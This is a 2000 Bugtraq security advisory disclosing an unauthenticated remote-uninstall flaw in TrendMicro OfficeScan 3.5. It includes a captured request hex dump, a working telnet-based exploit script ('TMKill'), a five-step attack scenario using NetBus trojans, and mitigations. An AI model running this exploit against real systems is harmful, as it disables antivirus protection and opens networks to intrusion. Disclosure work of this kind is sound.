[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    ALERT!: TendMicro InterScan (DOS & intrusion)
From:       Veille Technologique <gdn () neurocom ! com>
Date:       2000-02-28 21:14:46
[Download RAW message or body]

hi,
while i continued my tests with TrendMicro OfficeScan 3.5, i tried
something new with the anti-viral agent listening on the port 12345.
First, i sniffed an admin request from the web-based centralized server
toward the target. This request is in the http/1.0 protocol, so in a
human readable form.
this is an example of such a tracked request with the help of the very
cool buttsniffer (BO plug-in ;) ) :

=======
Source IP: x.x.x.x  Target IP: x.x.x.x
TCP  Length: 533  Source Port: 1241  Target Port: 12345  Seq: 00815779
Ack: 01263158
Flags: PA  Window: 8760  TCP ChkSum: 7159  UrgPtr: 0
 00000000: 47 45 54 20 2F 3F 30 35 36 38 30 46 35 34 35 45   GET
/?05680F545E
 00000010: 38 38 41 45 44 35 33 39 32 42 38 38 35 45 45 37
88AED5392B885EE7
 00000020: 31 34 32 44 38 42 42 46 38 45 33 35 32 36 39 33
142D8BBF8E352693
 00000030: 37 32 35 34 33 30 44 43 31 45 37 46 39 35 34 46
725430DC1E7F954F
 00000040: 42 33 34 35 46 45 38 39 39 46 30 31 32 30 33 42
B345FE899F01203B
 00000050: 32 32 32 43 46 41 46 38 42 30 35 43 41 35 44 39
222CFAF8B05CA5D9
 00000060: 30 43 46 35 44 45 45 37 33 38 31 30 32 41 42 31
0CF5DEE738102AB1
 00000070: 43 41 45 45 45 36 32 46 37 46 34 41 41 33 36 45
CAEEE62F7F4AA36E
 00000080: 43 44 32 30 43 42 35 45 41 44 45 43 32 43 35 34
CD20CB5EADEC2C54
 00000090: 37 37 36 36 35 30 44 35 35 35 41 39 34 31 35 42
776650D555A9415B
 000000A0: 45 35 33 34 38 45 37 46 30 30 46 39 38 31 41 35
E5348E7F00F981A5
 000000B0: 44 42 45 45 31 46 33 41 42 33 30 46 41 42 43 34
DBEE1F3AB30FABC4
 000000C0: 33 33 32 33 30 46 36 36 42 34 39 39 38 32 46 44
33230F66B49982FD
 000000D0: 41 35 46 30 37 37 44 30 37 41 46 37 32 31 43 44
A5F077D07AF721CD
 000000E0: 37 39 31 38 41 35 35 38 30 43 33 33 31 42 43 34
7918A5580C331BC4
 000000F0: 43 32 41 39 35 39 42 46 36 33 34 31 31 32 42 34
C2A959BF634112B4
 00000100: 46 39 41 39 33 39 35 33 42 38 46 36 34 42 30 32
F9A93953B8F64B02
 00000110: 43 38 38 31 45 44 36 43 35 35 42 46 43 44 36 32
C881ED6C55BFCD62
 00000120: 30 35 36 31 33 34 42 42 46 38 30 30 37 45 46 46
056134BBF8007EFF
 00000130: 42 36 36 34 33 35 31 38 31 41 37 37 36 32 45 45
B66435181A7762EE
 00000140: 30 32 42 38 39 31 33 46 35 34 35 44 32 35 31 31
02B8913F545D2511
 00000150: 38 39 37 43 38 39 38 46 33 45 35 33 42 42 38 44
897C898F3E53BB8D
 00000160: 34 46 34 45 43 37 31 45 37 46 41 43 36 44 38 45
4F4EC71E7FAC6D8E
 00000170: 32 36 44 33 45 35 35 41 39 41 37 43 31 45 42 39
26D3E55A9A7C1EB9
 00000180: 36 42 44 46 44 32 42 45 38 34 34 46 43 35 45 43
6BDFD2BE844FC5EC
 00000190: 36 35 44 41 46 36 43 37 31 43 30 32 39 34 32 41
65DAF6C71C02942A
 000001A0: 39 32 42 42 39 37 38 41 43 38 37 35 31 32 30 32
92BB978AC8751202
 000001B0: 43 35 30 45 45 34 30 34 34 35 44 44 36 43 44 31
C50EE40445DD6CD1
 000001C0: 31 43 45 31 31 41 39 39 30 34 20 48 54 54 50 2F   1CE11A9904
HTTP/
 000001D0: 31 2E 30 0D 0A 48 6F 73 74 3A 20 31 30 2E 31 2E   1.0..Host:
x.x.x.x
 000001E0: 36 2E 39 34 3A 31 32 33 34 35 0D 0A 55 73 65 72
:12345..User
 000001F0: 2D 41 67 65 6E 74 3A 20 4F 66 66 69 63 65 53 63   -Agent:
OfficeSc
 00000200: 61 6E 2F 33 2E 35 0D 0A 41 63 63 65 70 74 3A 20
an/3.5..Accept:
 00000210: 2A 2F 2A 0D 0A                                    */*..
===========

Note the very big ascii string behind the default html document.
This string means in this case: "remote un-installation of TrendMicro
product" !
So i replaid the same request toward another client with success. Few
seconds later, this workstation didn't have no longer OfficeScan
installed on it.The product was removed from the hard disk on the target
system.


That attack was conducted against a windows NT 4.0 SP5 OfficeScan 3.5,
since the problem relies in a protocol layer  not in the system
involved, others system like windows 9.X et windows 3.x should be
infected too.

Conclusion: A malicious user is able to remotly suppress every
OfficeScan inside the company network (stealing the admin priviledge)
without any authentication just because, this authentication is only
used to launch the manager not to sign or crypt the paquets.
Because the manager is used to do other administration task, it may be
possible to upload a zero length signature file, for example.
A dark scenario may be this one, in five steps:

1- the malicious user inject a bad signature file to all the pc
2- then he send his trojanned mail ( with a netbus attached ) to every
users.
3- after a good time drinking his cola, he starts netbus client and look
for all the possibly infected stations.
4- because 12345 is the netbus port too, admins should not understand
immediatly that they r under attack
5- the attacker start his bad job .

i wrote a little exploit too:

#!/bin/sh
#
# Usage: TMKill target_ip
# gdn@neurocom.com ( Gregory Duchemin )
#
(
sleep 2
echo "GET
/?05680F545E88AED5392B885EE7142D8BBF8E352693725430DC1E7F954FB345FE899F
01203B222CFAF8B05CA5D90CF5DEE738102AB1CAEEE62F7F4AA36ECD20CB5EADEC2C54776

650D555A9415BE5348E7F00F981A5DBEE1F3AB30FABC433230F66B49982FDA5F077D07AF721C

D7918A5580C331BC4C2A959BF634112B4F9A93953B8F64B02C881ED6C55BFCD62056134BBF80

07EFFB66435181A7762EE02B8913F545D2511897C898F3E53BB8D4F4EC71E7FAC6D8E26D3E55A

9A7C1EB96BDFD2BE844FC5EC65DAF6C71C02942A92BB978AC8751202C50EE40445DD6CD11C

E11A9904 HTTP/1.0"
echo "Host:"$1":12345"
echo "User-Agent: OfficeScan/3.5"
echo "Accept:*/*"
echo
sleep 10
)| telnet $1 12345 2>&1 | tee -a ./log.txt


Solutions:

1- contact TrendMicro.
2- close the 12345 port of all the stations, stop the service TMlisten
in the services menu ( NT ), no more network upgrade till TrendMicro ll
give us a patch.
3- install sniffers all over the network to track possible attackers.


===================
Gregory Duchemin
Network & Security Engineer.
gdn@neurocom.com
http://www.securite-internet.com
===================

[prev in list] [next in list] [prev in thread] [next in thread]